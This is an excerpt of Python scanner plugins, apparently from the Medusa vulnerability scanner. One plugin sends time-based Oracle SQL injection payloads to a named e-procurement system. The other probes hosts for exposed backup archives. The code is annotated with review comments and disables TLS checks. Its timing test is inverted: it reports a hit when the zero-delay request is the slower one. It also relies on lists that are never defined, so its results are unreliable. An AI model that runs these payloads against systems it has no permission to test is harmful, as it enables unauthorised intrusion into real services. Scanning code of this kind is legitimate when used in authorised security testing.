    payload1 = "%20AND%206371=DBMS_PIPE.RECEIVE_MESSAGE(11,0)"
    payload2 = "%20AND%206371=DBMS_PIPE.RECEIVE_MESSAGE(11,5)"
    for payload in urls:
        try:
            payload_url = scheme + "://" + url + ":" + str(
                port) + payload + payload1
            payload_url2 = scheme + "://" + url + ":" + str(
                port) + payload + payload2

            headers = {
                'User-Agent':
                RandomAgent,
                'Content-Type':
                'application/x-www-form-urlencoded',
                'Accept':
                'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
            }

            s = requests.session()  # a fresh session per endpoint
            # Wall-clock stamps around each request; a 6 s timeout bounds both.
            time0 = time.time()
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)  # TLS certificate checking is disabled
            time1 = time.time()
            resp2 = s.get(payload_url2,
                          headers=headers,
                          timeout=6,
                          verify=False)
            time2 = time.time()
            con = resp.text
            code = resp.status_code
            code2 = resp2.status_code
            # Hit when the first request took more than 4 s longer than the
            # second. The status-code != 0 tests are always true for a
            # completed response. NOTE(review): confirm the comparison
            # direction is the intended one.
            if code2 != 0 and code != 0 and ((time1 - time0) -
                                             (time2 - time1)) > 4:
                Medusa = "{}存在一采通电子采购系统SQL注入漏洞\r\n 验证数据:\r\n返回内容:{}\r\npayload:{}\r\n".format(
                    url, con, payload_url)
                _t = VulnerabilityInfo(Medusa)
                web = ClassCongregation.VulnerabilityDetails(_t.info)
                web.High()  # severity levels: serious, High, Intermediate, Low
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  # write to file: url names the target file, Medusa is the result
        except Exception:
            _ = VulnerabilityInfo('').info.get('algroup')
            _l = ClassCongregation.ErrorLog().Write(url, _)  # log the error under the plugin name
def medusa(Url,RandomAgent,ProxyIp):
    """Exposed archive / backup file check: derive candidate file names from
    the host name, try each with every suffix, and then try a fixed list of
    special paths.

    Url: target base URL; UrlProcessing() splits it into scheme, host, port.
    RandomAgent: User-Agent value for the requests.
    ProxyIp: optional host:port used to build an http proxy mapping.
    Returns _t.info on the first text/plain hit in the special-path loop,
    otherwise the list of report fragments (Medusas). The port derived
    below is never used in the request URLs.
    `payloads`, `suffixs` and `SpecialPayload` are not defined here;
    presumably module-level lists — note that `payloads` is appended to on
    every call and so grows across calls.
    """

    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL carried none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    # Responses are stored in module globals rather than locals.
    global resp
    global resp2
    Medusas=[]
    Medusa = "{} 存在敏感文件压缩下载漏洞\r\n漏洞详情:\r\nPayload:".format(url)
    Medusas.append(str(Medusa))
    # Build host-name-derived candidates (joined with ':', '', '.', '_', '-').
    colon_payload = ""
    unsigned_payload = ""
    point_payload = ""
    underline_payload = ""
    expansion_number_payload = ""
    url_str_list = url.split(".")
    for url_str in url_str_list:
        colon_payload = colon_payload + url_str + ":"
    for url_str in url_str_list:
        unsigned_payload = unsigned_payload + url_str
    for url_str in url_str_list:
        point_payload = point_payload + url_str + "."
    for url_str in url_str_list:
        underline_payload = underline_payload + url_str + "_"
    for url_str in url_str_list:
        expansion_number_payload = expansion_number_payload + url_str + "-"
    # [:-1] drops the trailing separator added by the loops above.
    payloads.append(str("/"+colon_payload[:-1]))
    payloads.append(str("/"+unsigned_payload))
    payloads.append(str("/"+point_payload[:-1]))
    payloads.append(str("/"+underline_payload[:-1]))
    payloads.append(str("/"+expansion_number_payload[:-1]))

    for payload in payloads:
        for suffix in suffixs:
            try:
                payload_url = scheme+"://"+url+payload+suffix

                headers = {
                    'Accept-Encoding': 'gzip, deflate',
                    'Accept': '*/*',
                    'User-Agent': RandomAgent,
                }
                #s = requests.session()
                # HEAD supplies the status code; the GET that follows downloads
                # the whole body just to read its Content-Type.
                if ProxyIp!=None:
                    proxies = {
                        # "http": "http://" + str(ProxyIps) , # the proxy value must be prefixed with http:// or https://
                        "http": "http://" + str(ProxyIp)
                    }
                    resp = requests.head(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)  # TLS certificate checking is disabled
                    resp2 = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
                elif ProxyIp==None:
                    resp = requests.head(payload_url,headers=headers, timeout=5, verify=False)
                    resp2 = requests.get(payload_url, headers=headers, timeout=5, verify=False)
                con = resp.text  # body of a HEAD response; unused
                code = resp.status_code
                # Hit: 200 plus an archive Content-Type. A missing header raises
                # KeyError, which the except below silently drops.
                if code==200 and (resp2.headers["Content-Type"] == "application/zip" or resp2.headers["Content-Type"] == "application/x-rar-compressed" or resp2.headers["Content-Type"] == "application/x-gzip" or resp2.headers["Content-Type"] == "application/gzip") :
                    Medusa="{}\r\n".format(payload_url)
                    Medusas.append(str(Medusa))
            except Exception as e:
                pass  # errors for individual candidates are ignored
    for Special in SpecialPayload:
        try:
            payload_url = scheme + "://" + url + Special

            headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            # s = requests.session()
            if ProxyIp != None:
                proxies = {
                    # "http": "http://" + str(ProxyIps) , # the proxy value must be prefixed with http:// or https://
                    "http": "http://" + str(ProxyIp)
                }
                resp = requests.head(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
                resp2 = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
            elif ProxyIp == None:
                resp = requests.head(payload_url, headers=headers, timeout=5, verify=False)
                resp2 = requests.get(payload_url, headers=headers, timeout=5, verify=False)
            con = resp.text  # body of a HEAD response; unused
            code = resp.status_code
            # Hit: 200 with a text/plain Content-Type. Returns on the first hit,
            # so any archive hits collected above are not reported here.
            if code == 200 and resp2.headers["Content-Type"] == "text/plain":
                Medusa = "{}\r\n".format(payload_url)
                Medusas.append(str(Medusa))
                _t = VulnerabilityInfo(Medusa)
                web = ClassCongregation.VulnerabilityDetails(_t.info)
                web.High()  # severity levels: serious, High, Intermediate, Low
                return (_t.info)
        except:  # bare except: also swallows KeyboardInterrupt / SystemExit
            logging.warning(Url)
            _ = VulnerabilityInfo('')
            logging.warning(_.info.get('parameter'))

    try:
        # The concatenated string is never used; the list itself is returned.
        for i in Medusas:
            Medusa=Medusa+i

        return Medusas
    except:
        pass